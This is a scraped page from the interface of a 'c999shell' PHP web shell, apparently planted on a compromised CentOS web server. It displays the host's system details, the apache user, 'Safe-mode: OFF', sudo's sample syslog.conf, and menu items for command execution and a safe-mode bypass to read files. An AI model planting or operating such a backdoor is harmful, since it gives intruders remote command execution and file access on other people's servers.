Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/sudo-1.7.2p1/ drwxr-xr-x |
Viewing file: sample.syslog.conf (1016 B) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | # This is a sample syslog.conf fragment for use with Sudo. # # Sudo logs to local2 by default, but this is changable via the # --with-logfac configure option. To see what syslog facility # a sudo binary uses, run `sudo -V' as *root*. You may have # to check /usr/include/syslog.h to map the facility number to # a name. # # NOTES: # The whitespace in the following line is made up of <TAB> # characters, *not* spaces. You cannot just cut and paste! # # If you edit syslog.conf you need to send syslogd a HUP signal. # Ie: kill -HUP process_id # # Syslogd will not create new log files for you, you must first # create the file before syslogd will log to it. Eg. # 'touch /var/log/sudo' # # $Sudo: sample.syslog.conf,v 1.3 2004/10/01 14:58:15 millert Exp $ # This logs successful and failed sudo attempts to the file /var/log/sudo local2.debug /var/log/sudo # To log to a remote machine, use something like the following, # where "loghost" is the name of the remote machine. local2.debug @loghost |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0077 ]-- |